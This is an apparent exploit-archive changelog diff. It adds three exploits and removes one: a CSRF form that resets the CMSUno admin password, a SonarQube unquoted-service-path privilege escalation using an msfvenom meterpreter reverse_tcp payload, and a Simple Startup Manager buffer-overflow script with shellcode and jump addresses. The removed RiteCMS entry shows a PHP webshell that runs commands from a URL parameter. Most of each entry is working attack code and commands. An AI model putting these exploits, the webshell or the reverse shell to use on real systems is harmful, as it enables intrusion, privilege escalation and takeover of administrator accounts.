DB: 2020-07-18

5 changes to exploits/shellcodes

Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path
Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC)

RiteCMS 2.2.1 - Remote Code Execution

CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)

exploits/php/webapps/48675.txt

@@ -1,40 +0,0 @@
-# Exploit Title: RiteCMS 2.2.1 - Remote Code Execution
-# Date: 2020-07-03
-# Exploit Author: Enes Özeser
-# Vendor Homepage: http://ritecms.com/
-# Version: 2.2.1
-# Tested on: Linux
-
-1- Go to following url. >> http://(CHANGE-THIS)/ritecms/cms/
-2- Default username and password is admin:admin.
-3- Go "Filemanager" and press "Upload file" button.
-4- Choose your php webshell script and upload it. 
-
-((Example PHP Web Shell Code)) 
-<?php echo "<pre>"; system($_GET['cmd']); ?>
-
-5- You can find uploaded file there. >> http://(CHANGE-THIS)/ritecms/media/(FILE-NAME).php
-6- We can execute a command now. >> http://(CHANGE-THIS)/ritecms/media/(FILE-NAME).php?cmd=whoami
-
-(( REQUEST ))
-
-GET /ritecms/media/webshell.php?cmd=whoami HTTP/1.1
-Host: 127.0.0.1
-User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-Accept-Language: en-US,en;q=0.5
-Accept-Encoding: gzip, deflate
-Referer: http://127.0.0.1/ritecms/cms/index.php?mode=filemanager&directory=media
-Connection: close
-Cookie: icms[device_type]=desktop; icms[guest_date_log]=1593777486; PHPSESSID=mhuunvasd12cveo52fll3u
-Upgrade-Insecure-Requests: 1
-
-(( RESPONSE ))
-
-HTTP/1.1 200 OK
-Date: Fri, 03 Jul 2020 21:10:13 GMT
-Server: Apache/2.4.43 (Debian)
-Content-Length: 14
-Connection: close
-Content-Type: text/html; charset=UTF-8
-<pre>www-data

exploits/php/webapps/48679.txt

@@ -0,0 +1,22 @@
+# Exploit Title: CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
+# Date: 2020-05-31
+# Exploit Author: Noth
+# Vendor Homepage: https://github.com/boiteasite/cmsuno
+# Software Link: https://github.com/boiteasite/cmsuno
+# Version: v1.6
+# CVE : 2020-15600
+
+An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.
+
+PoC : 
+
+<html>
+<body>
+<script>history.pushState(",",'/')</script>
+<form action=“http://127.0.0.1/cmsuno-master/uno.php”method=“POST”>
+<input type=“hidden” name=“user” value=“admin”/>
+<input type=“hidden” name=“pass” value=“yourpassword”/>
+<input type=“submit” name=“user” value=“Submit request”/>
+</form>
+</body>
+</html>

exploits/windows/local/48677.txt

@@ -0,0 +1,65 @@
+# Title: Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path
+# Author: Velayutham Selvaraj
+# Date: 2020-06-03
+# Vendor Homepage: https://www.sonarqube.org
+# Software Link: https://www.sonarqube.org/downloads/
+# Version : 8.3.1
+# Tested on: Windows 10 64bit(EN)
+
+About Unquoted Service Path :
+==============================
+
+When a service is created whose executable path contains spaces and isn't
+enclosed within quotes,
+leads to a vulnerability known as Unquoted Service Path which allows a user
+to gain SYSTEM privileges.
+(only if the vulnerable service is running with SYSTEM privilege level
+which most of the time it is).
+
+Steps to recreate :
+=============================
+
+1.  Open CMD and Check for USP vulnerability by typing [ wmic service get
+name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v
+"c:\windows\\" | findstr /i /v """ ]
+2.  The Vulnerable Service would Show up.
+3.  Check the Service Permissions by typing [ sc qc SonarQube]
+4.  The command would return..
+
+C:\Users\HP-840-G2-ELITEBOOK>sc qc SonarQube
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: SonarQube
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   :
+C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\bin\windows-x86-64\wrapper.exe
+-s
+C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\conf\wrapper.conf
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : SonarQube
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+5.  This concludes that the service is running as SYSTEM. "Highest
+privilege in a machine"
+6.  Now create a Payload with msfvenom or other tools and name it to
+wrapper.exe
+7.  Make sure you have write Permissions to where you downloaded. i kept it
+in downloads folders but confirmed it in program files as well.
+8.  Provided that you have right permissions, Drop the wrapper.exe
+executable you created into the
+"C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\bin\windows-x86-64\"
+Directory.
+9.  Now restart the IObit Uninstaller service by giving coommand [ sc stop
+SonarQube] followed by [ sc start SonarQube]
+10. If your payload is created with msfvenom, quickly migrate to a
+different process. [Any process since you have the SYSTEM Privilege].
+
+During my testing :
+
+Payload : msfvenom -p windows/meterpreter/reverse_tcp -f exe -o wrapper.exe
+Migrate : meterpreter> run post/windows/manage/migrate [To migrate into a
+different Process ]

exploits/windows/local/48678.py

@@ -0,0 +1,58 @@
+# Exploit Title: Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC) 
+# Exploit Author: PovlTekstTV
+# Date: 2020-07-15
+# Vulnerable Software: Simple Startup Manager
+# Software Link Download: http://www.ashkon.com/download/startup-manager.exe
+# Version: 1.17
+# Vulnerability Type: Local Buffer Overflow
+# Tested on: Windows 7 Ultimate Service Pack 1 (32 and 64 bit)
+# DEP and ASLR Disabled on system
+# Space for shellcode: 264
+
+#!/usr/bin/python
+# Two sets of instructions are needed:
+# 1. JMP EDI
+# 2. JMP EBX 
+# I found these in the OS-module: SETUPAPI.dll, which is usually protected using ASLR
+# The exploit will properly not work unless changed/bruteforced.
+
+# It is also possible to overwrite the SEH-handler with 600+ bytes,
+# however I did not find any POP, POP, RETs.
+
+# Walkthrough:
+#   1.- Run the python script, it will create a new file "exploit.txt"
+#   2.- Copy the content of the new file 'exploit.txt' to clipboard
+#   3.- Turn off DEP for startup-manger.exe
+#   4.- Open 'startup-manger.exe'
+#   5.- Click 'New' or go to 'File' and click 'New'
+#   6.- Paste content from clipboard into 'File' parameter
+#   7.- Click on 'OK'
+#   9.- Calc.exe runs.
+
+#Identified the following badchars: x00 x0a x09 x0c x0d x3a x5c
+#msfvenom -p windows/exec cmd=calc.exe -f c -b "\x00\x0a\x0c\x0d\x3a\x5c"
+shellcode = ("\xdb\xd0\xd9\x74\x24\xf4\xbe\xcb\xe3\xc2\xa5\x5a\x33\xc9\xb1"
+"\x31\x83\xc2\x04\x31\x72\x14\x03\x72\xdf\x01\x37\x59\x37\x47"
+"\xb8\xa2\xc7\x28\x30\x47\xf6\x68\x26\x03\xa8\x58\x2c\x41\x44"
+"\x12\x60\x72\xdf\x56\xad\x75\x68\xdc\x8b\xb8\x69\x4d\xef\xdb"
+"\xe9\x8c\x3c\x3c\xd0\x5e\x31\x3d\x15\x82\xb8\x6f\xce\xc8\x6f"
+"\x80\x7b\x84\xb3\x2b\x37\x08\xb4\xc8\x8f\x2b\x95\x5e\x84\x75"
+"\x35\x60\x49\x0e\x7c\x7a\x8e\x2b\x36\xf1\x64\xc7\xc9\xd3\xb5"
+"\x28\x65\x1a\x7a\xdb\x77\x5a\xbc\x04\x02\x92\xbf\xb9\x15\x61"
+"\xc2\x65\x93\x72\x64\xed\x03\x5f\x95\x22\xd5\x14\x99\x8f\x91"
+"\x73\xbd\x0e\x75\x08\xb9\x9b\x78\xdf\x48\xdf\x5e\xfb\x11\xbb"
+"\xff\x5a\xff\x6a\xff\xbd\xa0\xd3\xa5\xb6\x4c\x07\xd4\x94\x1a"
+"\xd6\x6a\xa3\x68\xd8\x74\xac\xdc\xb1\x45\x27\xb3\xc6\x59\xe2"
+"\xf0\x39\x10\xaf\x50\xd2\xfd\x25\xe1\xbf\xfd\x93\x25\xc6\x7d"
+"\x16\xd5\x3d\x9d\x53\xd0\x7a\x19\x8f\xa8\x13\xcc\xaf\x1f\x13"
+"\xc5\xd3\xfe\x87\x85\x3d\x65\x20\x2f\x42")
+
+payload = shellcode
+payload += ("A"*(268-len(payload)-4))
+payload += ("\xe4\xa9\x4e\x76") #0x764ea9e4 (JMP EBX) {PAGE_READONLY} [SETUPAPI.dll]
+payload += ("\x5f\xbc\x4e\x76") #0x764ebc5f (JMP EDI) {PAGE_READONLY} [SETUPAPI.dll]
+
+#Write payload to file
+file = open("exploit.txt" , 'w')
+file.write(payload)
+file.close()

files_exploits.csv

@@ -11120,6 +11120,8 @@ id,file,description,date,author,type,platform,port
 48625,exploits/windows/local/48625.txt,"KiteService 1.2020.618.0 - Unquoted Service Path",2020-06-26,"Marcos Antonio León",local,windows,
 48628,exploits/windows/local/48628.py,"RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)",2020-07-01,"Paras Bhatia",local,windows,
 48644,exploits/hardware/local/48644.c,"Sony Playstation 4 (PS4) < 7.02 / FreeBSD 9 / FreeBSD 12 - 'ip6_setpktopt' Kernel Local Privilege Escalation (PoC)",2020-03-21,TheFloW,local,hardware,
+48677,exploits/windows/local/48677.txt,"Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path",2020-07-17,"Velayutham Selvaraj",local,windows,
+48678,exploits/windows/local/48678.py,"Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC)",2020-07-17,PovlTekstTV,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42922,5 +42924,5 @@ id,file,description,date,author,type,platform,port
 48672,exploits/php/webapps/48672.txt,"Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass",2020-07-15,KeopssGroup0day_Inc,webapps,php,
 48673,exploits/php/webapps/48673.txt,"Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting",2020-07-15,KeopssGroup0day_Inc,webapps,php,
 48674,exploits/php/webapps/48674.txt,"Infor Storefront B2B 1.0 - 'usr_name' SQL Injection",2020-07-15,ratboy,webapps,php,
-48675,exploits/php/webapps/48675.txt,"RiteCMS 2.2.1 - Remote Code Execution",2020-07-16,"Enes Özeser",webapps,php,
 48676,exploits/lua/webapps/48676.txt,"Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)",2020-07-16,V1n1v131r4,webapps,lua,
+48679,exploits/php/webapps/48679.txt,"CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)",2020-07-17,Noth,webapps,php,